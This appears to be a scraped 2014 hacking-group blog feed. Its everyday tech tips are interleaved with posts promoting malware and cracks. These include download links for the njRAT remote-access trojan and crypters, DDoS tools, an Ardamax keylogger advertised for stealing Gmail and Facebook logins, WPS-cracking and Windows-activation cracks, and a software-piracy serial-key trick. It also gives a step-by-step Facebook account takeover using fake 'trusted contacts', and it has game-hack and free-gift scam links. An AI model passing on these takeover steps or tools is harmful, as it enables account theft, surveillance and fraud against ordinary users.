<bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000> <bg=b0ff0000>

Use Gmail without internet on Chrome

 

Use Gmail without internet on Chrome with Gmail offline Gmail is one of the most used email service online, it is amongst one of the most popular service like Facebook, Youtube etc, Facebook can also be used without internet as we have already told using Facebook by fonetwish, You can also browse gmail offline easily with the help of a chrome extension “Gmail offline” Once you have installed it you can enable offline surfing for your account. You can enable offline gmail directly from your account, Here is a short tutorial to guide you, explain the features it provide, how to do it and how it works How to configure:- Go to http://www.gmail.com from the chrome browser, click on settings (gear) and then again settings again Click offline tab > install gmail offline Once you do it, you will be redirected to the chrome appstore to download the extension “gmail offline”, download it, after the download completes following link will open up- chrome://apps/ showing a list of apps you need to click on “gmail offline” as you click it your email will open up showing you the messages received and other folders, you can read these conversations and messages offline without internet. That’s it, now when ever you are offline and don’t have anything to do, just open up this link chrome://apps/ and browse gmail offline without active internet connection. You can use this app offline to read, archive, delete mails etc, It is necessary to connect with internet in order to sync the messages, while you are offline all your requests for read,delete will stand in queue to be processed as soon as you connect with the internet.

What is a VPN and how does it work

 

What is a VPN and how does it work? A VPN or Virtual Private Network is a method used to add security and privacy to private and public networks, like WiFi Hotspots and the Internet. VPNs are most often used by corporations to protect sensitive data. However, using a personal VPN is increasingly becoming more popular for every citizen as more interactions that were previously face- to-face transition to the Internet. Privacy is increased with a VPN because the user’s initial IP address is replaced with one from the VPN provider. This method allows subscribers to attain an IP address from any gateway city the VPN service provides. For instance, you may live in San Francisco, but with a VPN, you can appear to live in Amsterdam, New York, or any number of gateway cities. It is also the best method to surf anonymously. And on top: You will bypass online blocks to access foreign content like a local. Get to websites back home when you’re abroad. And bypass government or workplace censorship of sites like Facebook, Gmail and Youtube. Plus, you can download torrents and use P2P programmes anonymously. Which VPN Service does Anonymous recommend and use? There are many choices when it comes to VPN providers. There are some VPN providers who offer free service and there are some which charge for VPN service. We have found that the paid VPN provider IPVANISH is doing an excellent job compared to the free service providers, which are very unreliable, slow and not safe. IPVANISH offers robust gateways, proven security, free software, unmatched speed, unlimited bandwith, and the best of all: IT HAS NO TRAFFIC LOGS! Unlike other VPN companies do they NOT collect any data because of their no-log policy! And to stay completely and 100% anonymous, they even offer to pay via paysafecard (but they offer also the usual payment methods and even accept paypal). And on top of that do they not only offer the VPN software for Windows, Mac, Ubuntu, Chromebook and Routers, but they also offer ANDROID & IOS VPN Apps for easy install. It is really easy to setup the VPN connection either on PCs or on mobile devices with the apps, everyone can do it within a few clicks.

Hacker_ANASS

 

السلام عليكم ورحمة الله وبركاته ادمين جديد يلتحق Hacker_ANASS https://www.youtube.com/user/Hackermarocain2014

Program wifiprotector protection aloivi hack

 

Program wifiprotector protection aloivi hack http://www.taqafa2.com/2014/11/wifiprotector.html

[FAST HACKING] Remote Exploit in Internet Explorer

 

[FAST HACKING] Remote Exploit in Internet Explorer Like, share and subscribe https://www.youtube.com/watch?v=klWKnxIyGRg

1) First Login To Your Facebook Account

 

1) First Login To Your Facebook Account Here I already logged into to and i opened my "PAGE ROLES" Now Open "business.facebook.com" Enter The Name Of The Business And Select The Page For Which You Want To Add Permanent Manager Leave Last Column Empty Fill All The Details After Filling Details Click Create Business Manager This Is How A Business Page Now Go To The "Page Roles" To Check It Out Thats It A Normal Page Admin Can Not Delete Business Manager

http://www.tweakingtricks.com/2014/11/facebook-latest-prank-ever.html

http://www.tweakingtricks.com/2014/11/facebook-latest-prank-ever.html

How to use HTTPS Everywhere http://youtu.be/wUJcPDnYAHA

Visit JackkTutorials.com for more content! Including Blogs, Forums and Downloads.

In this video Jackk shows you how to defend against SSLStrip Attacks using HTTPS Everywhere.

▂▃▅▆▇█ Resources used in this video █▇▆▅▃▂

Forum Thread: http://jackktutorials.com/forums/show...
HTTPS Everywhere: https://www.eff.org/HTTPS-EVERYWHERE
▂▃▅▆▇█Contact Details █▇▆▅▃▂

Email (Jackk): admin@jackktutorials.com
Email (Zmaster): zmaster@jackktutorials.com
Website: http://www.jackktutorials.com
Forumd: http://www.jackktutorials.com/forums

http://youtu.be/wUJcPDnYAHA

http://youtu.be/8CQhN0xtez0

njRAT Downloader v0.1

http://sh.st/i0eiB
=============
DeepSea

http://sh.st/i0edD
=============
DNGuard

http://sh.st/i0ejS
=============
موقع رفع

http://rghost.net/
=============
موقع فحص مايرسل القيم : http://nodistribute.com/

موقع فحص مايرسل القيم : http://virusscan.jotti.org/
=============

http://youtu.be/8CQhN0xtez0

Hello today I got you a programme of rfie private:)

 

Hello today I got you a programme of rfie private:) A ddos attack software and driver njratv0.7 download link: http://www.gulfup.com/?CBuINr latenso Lake:)

Finding Serial Key Of Any Software Using Simple Google trick

 

of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily How To Find Serial Key Of Any Software ? The key 94FBR is a part of Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

https://www.youtube.com/user/MsUtchiha

https://www.youtube.com/user/MsUtchiha

http://worldwideprogramers.blogspot.in/2014/11/website-hacking-using-havij-116.html

http://worldwideprogramers.blogspot.in/2014/11/website-hacking-using-havij-116.html

Run then cmd then msconfig .. http://youtu.be/bCuC20GEI5s

http://youtu.be/bCuC20GEI5s

Lesson talks about units and utility.. Watch fun.. https://www.youtube.com/watch?v=K27LzmLyJNs #

Lesson talks about units and utility.. Watch fun.. https://www.youtube.com/watch?v=K27LzmLyJNs #

Lesson talks about units and utility.. Watch fun.. https://www.youtube.com/watch?v=K27LzmLyJNs #

Windows system key combinations

 

Windows system key combinations F1: Help CTRL+ESC: Open Start menu ALT+TAB: Switch between open programs ALT+F4: Quit program SHIFT+DELETE: Delete item permanently Windows Logo+L: Lock the computer (without using CTRL+ALT+DELETE) Windows program key combinations CTRL+C: Copy CTRL+X: Cut CTRL+V: Paste CTRL+Z: Undo CTRL+B: Bold CTRL+U: Underline CTRL+I: Italic Mouse click/keyboard modifier combinations for shell objects SHIFT+right click: Displays a shortcut menu containing alternative commands SHIFT+double click: Runs the alternate default command (the second item on the menu) ALT+double click: Displays properties SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin General keyboard-only commands F1: Starts Windows Help F10: Activates menu bar options SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item) CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu) CTRL+SHIFT+ESC: Opens Windows Task Manager ALT+DOWN ARROW: Opens a drop-down list box ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window) SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window) ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window) CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program ALT+underlined letter in menu: Opens the menu ALT+F4: Closes the current window CTRL+F4: Closes the current Multiple Document Interface (MDI) window ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window) Shell objects and general folder/Windows Explorer shortcuts For a selected object: F2: Rename object F3: Find all files CTRL+X: Cut CTRL+C: Copy CTRL+V: Paste SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin ALT+ENTER: Open the properties for the selected object To copy a file Press and hold down the CTRL key while you drag the file to another folder. To create a shortcut Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder. General folder/shortcut control F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer) F5: Refreshes the current window. F6: Moves among panes in Windows Explorer CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only) CTRL+Z: Undo the last command CTRL+A: Select all the items in the current window BACKSPACE: Switch to the parent folder SHIFT+click+Close button: For folders, close the current folder plus all parent folders Windows Explorer tree control Numeric Keypad *: Expands everything under the current selection Numeric Keypad +: Expands the current selection Numeric Keypad -: Collapses the current selection. RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent Properties control CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs Accessibility shortcuts Press SHIFT five times: Toggles StickyKeys on and off Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off Microsoft Natural Keyboard keys Windows Logo: Start menu Windows Logo+R: Run dialog box Windows Logo+M: Minimize all SHIFT+Windows Logo+M: Undo minimize all Windows Logo+F1: Help Windows Logo+E: Windows Explorer Windows Logo+F: Find files or folders Windows Logo+D: Minimizes all open windows and displays the desktop CTRL+Windows Logo+F: Find computer CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray) Windows Logo+TAB: Cycle through taskbar buttons Windows Logo+Break: System Properties dialog box Application key: Displays a shortcut menu for the selected item Microsoft Natural Keyboard with IntelliType software installed Windows Logo+L: Log off Windows Windows Logo+P: Starts Print Manager Windows Logo+C: Opens Control Panel Windows Logo+V: Starts Clipboard Windows Logo+K: Opens Keyboard Properties dialog box Windows Logo+I: Opens Mouse Properties dialog box Windows Logo+A: Starts Accessibility Options (if installed) Windows Logo+SPACEBAR: Displays the list of Microsoft IntelliType shortcut keys Windows Logo+S: Toggles CAPS LOCK on and off Dialog box keyboard commands TAB: Move to the next control in the dialog box SHIFT+TAB: Move to the previous control in the dialog box SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option. ENTER: Equivalent to clicking the selected button (the button with the outline) ESC: Equivalent to clicking the Cancel button ALT+underlined letter in dialog box item: Move to the corresponding item

Hack Gmail, Facebook,Yahoo with Ardamax Keylogger

 

Hack Gmail, Facebook,Yahoo with Ardamax Keylogger (Free and full version) http://goo.gl/Wbz97S

Hello friends my team upload new Clash of Clans hacking tool is easily available to download right now using this website

 

 

Hello friends my team upload new Clash of Clans hacking tool is easily available to download right now using this website, where you will be able to get it for free and dominate the sport like never before. It’s usually fun to compete against buddies and win them. In order to take action, you must have access to unlimited resources and many people are looking for Clash of clans no cost gems guide or similar. If you are tired of searching with the right tool that will supply you infinite gold, elixir and gems, you have to come towards the right place. Your search ends right here the place that the free giveaway site is committed to helping gamers get the most outside the title. An impressive aspect from the h@ck is that it doesn’t require complex setup, configuration tweaks or other things. The fully working program will simply ask you to enter the number you dependence on select resources. Once you achieve this, and accept it, it will automatically be transferred to your account. The working h@ck is fully safe to use with. The antivirus or internet security programs installed with your PC or mobile phone will not likely detect any threats due to tool being completely malware no cost. http://hackerssquadron.blogspot.in/…/clash-of-clans-hack-ch…

Ethical Hacking Course Part-9 Escalating Privileges

 

Ethical Hacking Course Part-9 Escalating Privileges Like Share ‪#‎Hacking‬ ‪#‎Metasploit‬ ‪#‎OffensiveSecurity‬ ‪#‎KaliLinuxTools‬ ‪#‎PenetrationTesting‬ ‪#‎EthicalHacking‬ ‪#‎HackingClass‬ ‪#‎HackingCourse‬ ‪#‎KaliLinux‬ ‪#‎KaliLinuxClass‬ ‪#‎KaliLinuxCourse‬ ‪#‎Pentest‬ ‪#‎Backtrack‬ ‪#‎BacktrackLinux‬ ‪#‎Hack‬ ‪#‎EthicalHackingCourse‬ ‪#‎BhargavTandel‬ ‪#‎WebPenetrationTesting‬ ‪#‎WebsitePentest‬ ‪#‎WebsitePenetrationTesting‬ ‪#‎CEH‬ ‪#‎CEHv8‬ ‪#‎LPT‬ ‪#‎MSF‬ #Metasploit ‪#‎PostExploitation‬ http://youtu.be/xxLWdVQgbAQ

Block any websites in your Computer/Laptop without any software

 

Block any websites in your Computer/Laptop without any software. >>>Steps 1] Browse C:\WINDOWS\system32\drivers\etc 2] Find the file named "HOSTS" 3] Open it in notepad 4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable. 5] Done! example : 127.0.0.1 localhost 127.0.0.2 www.orkut.com www.orkut.com is now unaccessable For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before. ie: 127.0.0.3 www.yahoo.com 127.0.0.4 www.msn.com 127.0.0.5 www.google.com This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy. Hope this small tutorial could keep you going in simple way of blocking websites.

Tuesday, November 25, 2014

Follow These Step And Hack Facebook Account

 

Follow These Step And Hack Facebook Account → Step-1 : Create three fb fake accounts & one gmail account. → Step-2 : Now send friend request to your victim by each account. → Step-3 : Wait till your victim accept friend requests of each three accounts. → Step-4 : When your victim accept friend requests, then go to fb login page and click on forget password and enter your victim's fb username. → Step-5 : Now fb shows your victim's account name, click on 'yes, this is my account.' → Step-6 : Now enter your new gmail id. → Step-7 : Now fb says you to write any three true friends name, you write your all three accounts name → → → Step-8 : Now fb sends a code to these three ids, you reset password by these code and thats it you hacked your victim's account. this is only for education purpose....

http://www.wirelessdomination.com/how-to-crack-wpa2-and-wpa-wifi-password-step-by-step-guide/

http://www.wirelessdomination.com/how-to-crack-wpa2-and-wpa-wifi-password-step-by-step-guide/

http://www.youtube.com/watch…

http://www.youtube.com/watch…

http://www.youtube.com/watch…

The software developer to penetrate networks with wps

 

The software developer to penetrate networks with wps http://www.gulfup.com/?PW9dFt vulnerability

Site to send unlimited SMS

 

Site to send unlimited SMS for free and without registration http://www.afreesms.com/freesms/

For everyone who wants tvdaloooooooo

 

For everyone who wants tvdaloooooooo http://www.gulfup.com/?R683Ny denial-of-service tools

|| 6 tips to boost your phone, laptop’s battery life ||

 

|| 6 tips to boost your phone, laptop’s battery life || 1. Avoid extreme temperatures The battery of your device depends largely on the temperature of your surroundings. For instance, if you live in temperatures over 35 degrees celsius or below 0 degree celsius, the capacity of your phone's battery will reduce faster. Avoid leaving your phone or tablet in contact with direct sunlight or expose it to temperatures below freezing point. While extreme heat affects a battery more than extreme cold, both are equally harmful. 2. Full discharge vs partial discharge Many experts have professed the benefits of allowing your device to get fully discharged before plugging in the charger, but it has been found that a partial discharge is actually better than a full discharge cycle. It is usually helpful to keep the charge within the 40 to 80% range. This means charging your phone once it reaches 40% and then removing the charge once it reaches 80%. Of course, you will have to balance this out with the way and amount you use your device. For instance, if you are heading out and can't charge your phone, do charge it to 100%. 3. Avoid leaving it plugged in for extended periods of time Allowing your devices to be plugged into the charger after it has reached a 100% charge can be detrimental to your battery life. Overcharging your battery isn't wise because many phone manufacturers set the charge threshold lower on purpose so as to prolong battery life. Since lithium-ion batteries cannot absorb overcharge, the charge current needs to be cut off when it is fully charged. Overcharge would cause plating of metallic lithium, which could compromise the safety of your device. This piece of advice is rather difficult to follow where laptops are concerned,though. Leaving your laptop plugged in all the time could harm your laptop's battery in the long run. It is better to discharge it down to 40% every now and then. 4. Avoid ultra-fast charger Ultra-fast chargers can juice your phone up faster than regular chargers, but they affect the longevity of your battery in the long run. Stay away from them and use only the chargers you are meant to. 5. Fake chargers are a strict no You see those guys selling `branded' phone chargers at the traffic signals? Don't ever use them because they are cheap knock offs that will damage your battery or might even cause physical injury to you (remember the stories about chargers exploding?) 6. Medium-to-long-term storage You should keep your battery at around 50% before turning it off if you aren't using your device. Say you are going somewhere for a while and want to keep your device in storage, do so in a cool place with a temperature below 32 degrees celsius, with the battery at the halfway mark. Apple also suggests that a device going into storage for longer than six months should be charged to 50% every six months, regardless of the brand of device being used. The battery of your device, like every other technological innovation, comes with a shelf-life, and a ‘use-by’ date. But you could help prolong that shelflife significantly.

Clean%

 

Clean% https://www.youtube.com/watch?v=6l5aiiT5uu4&list=UUTudekkhLtEzSqRwcLoghrg

Maine wants to learn to program basic 2010 feras bvigwal Hamdan,

 

Maine wants to learn to program basic 2010 feras bvigwal Hamdan, Palestine, of course I have a page that is not high but endowed aagi feelings, they meet two explanations for this hardware, Elvis, everything https://www.youtube.com/channel/UCTudekkhLtEzSqRwcLoghrg

How to Compress 1 GB File into 10 MB Using KGB Archiver.

 

How to Compress 1 GB File into 10 MB Using KGB Archiver. ----- Here are some simple procedure to compress a file usingKGB Archiver Software First of all, Download the software from the links. Install it on your PC, Then Open the KGB ArchiverSoftware. Select “Compress Files” option and click next. On the next tab, select the folder or path where youwant to save the compressed file and give a name of the file. Then select the Compression level from Normal to Maximum and leave archive format as KGB. Select that file which you want to Compress by Click on Add File option. After doing all this steps, Click on Next, file compression process will start. This will take several minutes(or hours on slow pcs), depend on your file size. That’s all. You can use this tool to extract the compressed file at any time. Link. .. ---download.cnet.com/KGB-Archiver/3000-2250_4-10814647.html

Monday, November 24, 2014

<fg=b0ffd700> Golden

 

<fg=b0ffd700> Golden <fg=b0000000> Black <fg=b0ff7f00> Orange <fg=b0ffff00> Yellow <fg=b0ff00ff> Light pink <fg=b0ff00ff> Dark pink <fg=b0ff0000> Redish pink <fg=b0800000> Brown <fg=b0ffc0cb> Light purple <fg=b06f00ff> Dark Blue <fg=b0c0c0c0> Grey <fg=80ffffff> Sky Blue <fg=b000ffff> Light Blue <fg=b0bf00ff> Purple <fg=b08f00ff> Dark Purple <fg=b0808000> Mehandi Green <fg=b0f000f0> Majenta <fg=b00000ff> Blue <fg=b0b08080> Steel Grey <fg=b0000080> Movve <fg=b0964b00> Light Brown <fg=f0f00f0f> Red <fg=b000ff00> Green

my attempt at a social-blog in PHP

 

my attempt at a social-blog in PHP. I've been writing an API and Social Forum based on it for 7 months now, the API is set to go Open Source in a month or so. But I was just wondering what people thought of the functionality of the site. Aside from some C and Bash (for cleaning up files and queries) it is completely written in OOP PHP. http://indyboard.co Please all criticism!

Pe cât punem pariu că te fac să râzi ?

 

Pe cât punem pariu că te fac să râzi ? Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă..Vacă...Vacă...Vacă..Vacă...Vacă...Vacă..Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă....Vacă....Vacă....Vacă....Vacă..Vacă...Vacă..Vacă...Vacă..Vacă...Vacă...Vacă...Vacă...Vacă...Vacă...Vacă..Vacă...Vacă..Vacă..Vacă..Vacă..Vacă..Vacă..Vacă..Vacă..Vacă..Vacă..Vacă...Vacă...Vacă..Vacă..Bacă..Vacă..Vacă...Vacă...Vacă..Vacă..Vacă..Vacă Deja ştiu 4 lucruri despre tine : 1) Nu ai citit nici jumate din "Vacă" 2) Nu ţi-ai dat seama că una dintre ele e scris cu "B" ( de la Bou) 3) Te-ai întors să te uiţi care era scrisă cu "B" şi ţi-ai dat seama că ţi-ai luat ţeapă 4) Acum zâmbeşti şi asta mă face să ştiu deja 12 lucruri despre tine : 1) Citeşti asta 2) Eşti om 3) Nu poţi pronunţa litera "P " fără să ...fără să-ţi despărţi buzele 4) Tocmai ai încercat 6) Citeşti în continuare 7) Razi de tine 8) Erai ocupat să razi de tine că ai sărit peste numărul 5). 9) Ai verificat dacă era vreun "5)" 10) Tocmai ai râs 11) Încă razi :)) 12) Acum te gândeşti pe cine vei plictisi cu asta! :)))) Îti place....fii happy si bucurate de fiecare zi...ca nu stii cind peste un prost dai si tio poate strica.....M.F

At least supported us with your interaction to

 


At least supported us with your interaction to completehttps://www.youtube.com/watch?v=E5utfoZD0UY

https://www.youtube.com/watch?v=LQ0b2O5Ut-k&list=UUzvVkaOuE06-OYif2J27EPQ

https://www.youtube.com/watch?v=LQ0b2O5Ut-k&list=UUzvVkaOuE06-OYif2J27EPQ

http://wizarg.blogspot.ro/2014/11/cheat-8-ball-pool-d3d-menu_4.html

http://wizarg.blogspot.ro/2014/11/cheat-8-ball-pool-d3d-menu_4.html

udptunnel

 

6tunnel - TCP proxy for non-IPv6 applications
aircrack-ng - WEP/WPA cracking program
amap - a powerful application mapper
arp-scan - arp scanning and fingerprinting tool
bfbtester - Brute Force Binary Tester
bing-ip2hosts - Enumerate hostnames for an IP using bing
bsqlbf - Blind SQL injection brute forcer tool
btscanner - ncurses-based scanner for Bluetooth devices
chaosreader - trace network sessions and export it to html format
chkrootkit - rootkit detector
cryptcat - A lightweight version netcat extended with twofish encryption
darkstat - network traffic analyzer
dhcpdump - Parse DHCP packets from tcpdump
dissy - graphical frontend for objdump
dmitry - Deepmagic Information Gathering Tool
dns2tcp - TCP over DNS tunnel client and server
dnswalk - Checks dns zone information using nameserver lookups
dsniff - Various tools to sniff network traffic for cleartext insecurities
enum4linux - a tool for enumerating information from Windows and Samba systems
etherape - graphical network monitor
exploit-db - Exploit Database
fcrackzip - password cracker for zip archives
fimap - local and remote file inclusion tool
flasm - assembler and disassembler for Flash (SWF) bytecode
foremost - forensic program to recover lost files
fping - sends ICMP ECHO_REQUEST packets to network hosts
ftp-proxy - application level proxy for the FTP protocol
galleta - An Internet Explorer cookie forensic analysis tool
ghettotooth - a simple but effective blue driving tool
hostmap - hostnames and virtual hosts discovery tool
hping3 - Active Network Smashing Tool
httptunnel - Tunnels a data stream in HTTP requests
httrack - Copy websites to your computer (Offline browser)
hydra - Very fast network logon cracker
ike-scan - discover and fingerprint IKE hosts (IPsec VPN Servers)
inguma - Open source penetration testing toolkit
iodine - tool for tunneling IPv4 data through a DNS server
ipcalc - parameter calculator for IPv4 addresses
isr-evilgrade - take advantage of poor upgrade implementations by injecting fake updates
ipgrab - tcpdump-like utility that prints detailed header information
john - active password cracking tool
kismet - Wireless 802.11b monitoring tool
knocker - Simple and easy to use TCP security port scanner
lcrack - A generic password cracker
lynis - security auditing tool for Unix based systems
macchanger - utility for manipulating the MAC address of network interfaces
mboxgrep - Grep through mailboxes
mdk3 - bruteforce SSID's, bruteforce MAC filters, SSID beacon flood
medusa - fast, parallel, modular, login brute-forcer for network services
metagoofil - an information gathering tool designed for extracting metadata
metasploit - security project which provides information about security vulnerabilities
mysqloit - SQL Injection takeover tool focused on LAMP
mz - versatile packet creation and network traffic generation tool
nbtscan - A program for scanning networks for NetBIOS name information
netcat-traditional - TCP/IP swiss army knife
netdiscover - active/passive network address scanner using arp requests
netrw - netcat like tool with nice features to transport files over network
netsed - network packet-altering stream editor
netwag - graphical frontend for netwox
netwox - networking utilities
nikto - web server security scanner
nmapsi4 - graphical interface to nmap, the network scanner
nmap - The Network Mapper
nstreams - network streams - a tcpdump output analyzer
obexftp - file transfer utility for devices that use the OBEX protocol
onesixtyone - fast and simple SNMP scanner
openvas-client - Remote network security auditor, the client
openvas-server - remote network security auditor - server
ophcrack-cli - Microsoft Windows password cracker using rainbow tables (cmdline)
ophcrack - Microsoft Windows password cracker using rainbow tables (gui)
otp - Generator for One Time Pads or Passwords
p0f - Passive OS fingerprinting tool
packeth - Ethernet packet generator
packit - Network Injection and Capture
pbnj - a suite of tools to monitor changes on a network
pentbox - Suite that packs security and stability testing oriented tools
pdfcrack - PDF files password cracker
pnscan - Multi threaded port scanner
proxychains - proxy chains - redirect connections through proxy servers
pscan - Format string security checker for C files
ptunnel - Tunnel TCP connections over ICMP packets
ratproxy - passive web application security assessment tool
reaver - brute force attack tool against Wifi Protected Setup PIN number
s.e.t - social engineering toolkit
scrub - writes patterns on magnetic media to thwart data recovery
secure-delete - tools to wipe files, free disk space, swap and memory
sendemail - lightweight, command line SMTP email client
siege - HTTP regression testing and benchmarking utility
sipcrack - SIP login dumper/cracker
sipvicious - suite is a set of tools that can be used to audit SIP based VoIP systems
skipfish - fully automated, active web application security reconnaissance tool
socat - multipurpose relay for bidirectional data transfer
splint - tool for statically checking C programs for bugs
sqlbrute - a tool for brute forcing data out of databases using blind SQL injection
sqlmap - tool that automates the process of detecting and exploiting SQL injection flaws
sqlninja - SQL Server injection and takeover tool
ssldump - An SSLv3/TLS network protocol analyzer
sslscan - Fast SSL scanner
sslsniff - SSL/TLS man-in-the-middle attack tool
sslstrip - SSL/TLS man-in-the-middle attack tool
stunnel4 - Universal SSL tunnel for network daemons
swaks - SMTP command-line test tool
tcpdump - command-line network traffic analyzer
tcpflow - TCP flow recorder
tcpick - TCP stream sniffer and connection tracker
tcpreplay - Tool to replay saved tcpdump files at arbitrary speeds
tcpslice - extract pieces of and/or glue together tcpdump files
tcpspy - Incoming and Outgoing TCP/IP connections logger
tcptrace - Tool for analyzing tcpdump output
tcpxtract - extracts files from network traffic based on file signatures
theHarvester - gather emails, subdomains, hosts, employee names, open ports and banners
tinyproxy - A lightweight, non-caching, optionally anonymizing HTTP proxy
tor - anonymizing overlay network for TCP
u3-tool - tool for controlling the special features of a U3 USB flash disk
udptunnel - tunnel UDP packets over a TCP connection
ussp-push - Client for OBEX PUSH
vidalia - controller GUI for Tor
vinetto - A forensics tool to examine Thumbs.db files
voiphopper - VoIP infrastructure security testing tool
voipong - VoIP sniffer and call detector
w3af-console - framework to find and exploit web application vulnerabilities (CLI only)
w3af - framework to find and exploit web application vulnerabilities
wapiti - Web application vulnerability scanner
wash - scan for vunerable WPS access points
wavemon - Wireless Device Monitoring Application
wbox - HTTP testing tool and configuration-less HTTP server
webhttrack - Copy websites to your computer, httrack with a Web interface
weplab - tool designed to break WEP keys
wfuzz - a tool designed for bruteforcing Web Applications
wipe - Secure file deletion
wireshark - network traffic analyzer - GTK+ version
xprobe - Remote OS identification
yersinia - Network vulnerabilities check software
zenmap - The Network Mapper Front End
zzuf - transparent application fuzzer

لتحميل من الموقع الرسمي بحجم

http://www.pwnpi.com/

" 590 MB "

username:

" root "

password:

" toor "

 

Hacker-ANASS

Program activation of Windows 8-7-xp just installed after installation restart

 

Program activation of Windows 8-7-xp just installed after installation restart your computer http://www.gulfup.com/?9V3l2I Admin: ṇ̣̣̝̇̇̇ɑ̣̣̝̇̇çk̲̣̣̥ê̲̣̥â̲̣̣̥ 0 ̲̣̣̥ _ 2̲̣̣̣̥0̲̣̣̥1

Lesson 2 of python:).. If less interaction with unstoppable;)

 

Lesson 2 of python:).. If less interaction with unstoppable;) Good luck:), https://www.youtube.com/watch?v=l_vs8owRawc

https://www.youtube.com/watch?v=W5mL1zynPbU&feature=youtu.be

https://www.youtube.com/watch?v=W5mL1zynPbU&feature=youtu.be

How to spy on the menmak Web https

 

How to spy on the menmak Web https://www.youtube.com/watch?v=tC3My4h1AVs M-sTęr JøcKër

How To Create Undeletable And Unrenamable Folders

 

How To Create Undeletable And Unrenamable Folders ? Go to Start and then Click on Run Type cmd & hit enter (To open Command Prompt ). Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C: Type D: or E: and hit enter Type md con\ and hit enter (md - make directory) You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step. Open that directory, you will see the folder created of name con. Try to delete that folder or rename that folder windows will show the error It is not possible to delete that folder manually but you can delete this folder by another way mentioned below. Open Command Prompt Type D: ( if u created this type of folder in D: drive) & hit enter Type rd con\ (rd - remove directory) Open that directory and the folder will not appear because it is removed. By ‪#‎Ravindra‬ With hackers den Team

Sunday, November 23, 2014

http://hackerdunya.blogspot.com/2014/11/break-wifi-pasword.html

http://hackerdunya.blogspot.com/2014/11/break-wifi-pasword.html

ء الله ‫#‏المجانية‬ الأولى : ''إحصل على كابل

المجانيات أتنى أن تعجبكم ملاحظة : هده المجانيات ستصلكم في شهر إن شاء الله ‫#‏المجانية‬ الأولى : ''إحصل على كابل usb يصلك حتى باب منزلك'' لا تخطأ في العنوان لكي يصللك إلى المنزل رابط التسجيل للحصول على الكابل ==> http://goo.gl/V0g0Kp #المجانية الثانية ''إحصل على معجون أسنان colgate يصللك حتى باب بيتك مجانا'' رابط التسجيل للحصول على الهدية ==> http://goo.gl/oTT9tP #المجانية الثالثة إحصل على مجموعة من الأقلام الملونة تصللك حتى باب منزلك مجانا و بدون مقابل رابط التسجيل للحصول على الهدية ==> http://goo.gl/S4Imju #المجانية الرابعة إحصل على قميص بمقاصك يصللك حتى باب المنزل مجانا رابط التسجيل للحصول على الهدية ==> http://goo.gl/vd4tdt #المجانية الخامسة إحصل على بطاقة gastkclub مجانا تصلك حتى باب منزلك صورة إثبات الوصول : http://goo.gl/2PlI1y رابط التسجيل للحصول على الهدية : http://goo.gl/ol5j14 #المجانية السادسة إحصل على ملسقات للملابس مجانا تصلك حتى باب منزلك رابط الطلب من هنا : http://goo.gl/oI0WZb --------------------------

